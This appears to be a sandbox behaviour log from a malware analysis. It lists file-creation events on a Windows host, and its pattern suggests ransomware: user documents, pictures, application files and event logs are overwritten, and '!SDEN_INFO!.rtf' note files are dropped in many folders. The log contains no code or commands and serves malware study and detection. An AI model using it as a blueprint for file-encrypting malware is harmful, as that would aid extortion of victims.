| Create | C:\Users\FD1HVy\Documents\MDvWkEoF\V4v0at7yeL46Y_CL.docx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Documents\MDvWkEoF\nelwiEjV5ko739u\irP-_lJVXPj FWZ6iyYJ\Z_PSSxHcDpT\2-sCYYlXE1eIT.ods | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Sign White Paper.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\deploy\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\combine_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Welcome.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\resources\Picture2_80.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\AppData\Local\Mozilla\Firefox\Profiles\w7cr0hor.default\OfflineCache\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\FD1HVy\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\FD1HVy\AppData\Roaming\Microsoft\Access\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\idb\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\FD1HVy\Documents\MDvWkEoF\nelwiEjV5ko739u\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\FD1HVy\Documents\MDvWkEoF\nelwiEjV5ko739u\irP-_lJVXPj FWZ6iyYJ\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Document Cloud for Government.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Documents\MDvWkEoF\nelwiEjV5ko739u\irP-_lJVXPj FWZ6iyYJ\Z_PSSxHcDpT\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Travelocity.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\organize_poster2x-dark.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\protect_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\organize_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\compare_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\combine_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\protect_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\edit_pdf_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\compare_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\compare_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\redact_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\protect_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\compare_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\redact_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Pictures\6ZaKO22zBTdl.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Pictures\pmrx0XMNlqLx.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\588bce7c90097ed212\netfx_Extended.mzz | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-DeviceSetupManager%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Pictures\GrlY8zmzECSobnYyDGDm.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\$GetCurrent\SafeOS\GetCurrentRollback.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\scan_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\resources\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\FD1HVy\Pictures\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\588bce7c90097ed212\netfx_Extended_x86.msi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\optimize_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-MUI%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-Shell-Core%4ActionCenter.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Application.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\redact_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\edit_pdf_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Pictures\K1x_a5kN_6Xhy9ntGym\9YZdyXI1.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\$GetCurrent\SafeOS\preoobe.cmd | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\adobe-old-logo.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\588bce7c90097ed212\RGB9Rast_x86.msi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Pictures\K1x_a5kN_6Xhy9ntGym\43GhgeoJ1r.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\$GetCurrent\SafeOS\PartnerSetupComplete.cmd | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\AppData\Roaming\kRUtWme.xlsx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\AppData\Roaming\7 IWCWCLCExR.docx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-TaskScheduler%4Maintenance.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\588bce7c90097ed212\RGB9RAST_x64.msi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\scan_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Pictures\K1x_a5kN_6Xhy9ntGym\p4 5z.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\588bce7c90097ed212\DHtmlHeader.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Internet Explorer.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\$GetCurrent\SafeOS\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\FD1HVy\Pictures\K1x_a5kN_6Xhy9ntGym\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Pictures\K1x_a5kN_6Xhy9ntGym\ftH86.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\$GetCurrent\SafeOS\SetupComplete.cmd | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\HardwareEvents.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\588bce7c90097ed212\SetupUi.xsd | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\588bce7c90097ed212\Setup.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\System.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-AppReadiness%4Admin.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\bin\jjs.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Key Management Service.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-HotspotAuth%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Documents\MDvWkEoF\nelwiEjV5ko739u\GRAD8.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\optimize_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\bin\rmiregistry.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-Ntfs%4WHC.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-AppReadiness%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\bad_6088DED4F047F45E.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\bin\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-Kernel-WHEA%4Errors.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\calendars.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\scan_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-SmbClient%4Security.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\deploy\messages.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-SMBServer%4Connectivity.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\organize_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\deploy\messages_zh_HK.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\ext\jaccess.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-User Profile Service%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
